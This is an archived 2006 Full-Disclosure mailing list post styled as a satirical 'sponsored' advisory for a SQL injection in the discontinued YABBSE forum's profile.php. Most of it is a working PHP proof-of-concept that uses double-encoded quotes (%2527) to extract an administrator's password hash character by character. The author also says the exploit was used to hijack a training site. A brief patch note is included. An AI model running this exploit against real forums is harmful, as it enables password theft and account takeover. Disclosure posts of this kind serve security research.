[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] NDSD-06-001
From: "Sam Thomas" <Sam.Thomas () aquaterra ! org>
Date: 2006-06-23 0:43:50
Message-ID: 2438A048A42E974E954C41696816D4893F991C () exchange ! aquaterra ! org
[Download RAW message or body]
Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I \
better release my first N3td3v Sponsering Disclosure.....
NDSD-06-001: YABBSE SQL Injection
June 23, 2006
-- Sponsered post
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html
-- Affected Vendor:
The YABB SE Team
-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in \
mainstream use)
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable \
installations of the YABBSE message board.
The specific flaw exists within the "profile.php" php script which is used to give \
access to user profiles.
-- Vendor Response:The vendor for this product essentially no longer exists. It is \
recommended that you move to a supported message board.
-- Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory
-- Vulnerability
The vulnerability exists where the user supplied variable $user is processed by the \
urldecode() function twice, this allows for the %2527 (decodes to %27 decodes to ') \
SQL injection technique.
- Exploit
The following PoC exploit can be used to retrieve any users (IE admin) password hash \
which in turn can be used to immitate and login as that user:
**BEGIN PoC Code
<?php
/*
yabbse exploit
all versions - product discontinued
most of the code ripped from http://www.milw0rm.com/exploits/1036 \
<http://www.milw0rm.com/exploits/1036> so credit to str0ke and \
milkw0rm
*/
$server = "www.uberhacker.com <http://www.uberhacker.com> ";
$user="Dozix007"
$port = 80;
$hash = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes. This is \
translated to ' by urldecode. */
$url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" \
. $letter; $header = getHeader($server, $port, $url, "");
if(!preg_match("/An Error Has Occurred/",$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "GET $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
$header="";
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]
** End PoC Code
-- Patch
It is recomended that if you insist on continuing the use of this product, you remove \
the line which reads "$user = urldecode($user);" from all functions in \
"\sources\proflie.php"
-- Credit:
This vulnerability was discovered by me!
-- About N3td3v Sponsoring Disclosures:
Established by me, n3td3v sponsering disclosures (NDSD) is a system established to \
reward n3td3v for his (her?) posts to full disclosure which bring me more amusement \
than any 0-day possibly could.
The NDSD is unique in how vulnerability information sponsers the incompetency of \
n3td3v, for each amusing n3td3v post NDSD will attempt to release a disclosure of a \
previously unknown lame exploit. This is because most valid complaints aginst n3td3v \
claim that (s/)he contributes nothing to the secutiy comunity. The aim of NDSD is to \
sponser n3td3v posts thus ensuring that each directly corresponds to a positve \
contribution to FULL-DISCLOSURE.
-- Misc
For anyone interested, this was the exploit used to hijack www.uberhacker.com \
<http://www.uberhacker.com> - a legal hacker trainng site, which had as their \
primary challenge to hijack the website. The site has since had the majority of it's \
content removed.
NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk \
<http://www.emptyvessels.org.uk> ), one day we might get our website up.
***********************************************************************************
For more information about Aquaterra Leisure, see www.aquaterra.org
To shop for speedo or polar at bargain prices, see www.aquashop.org
***********************************************************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic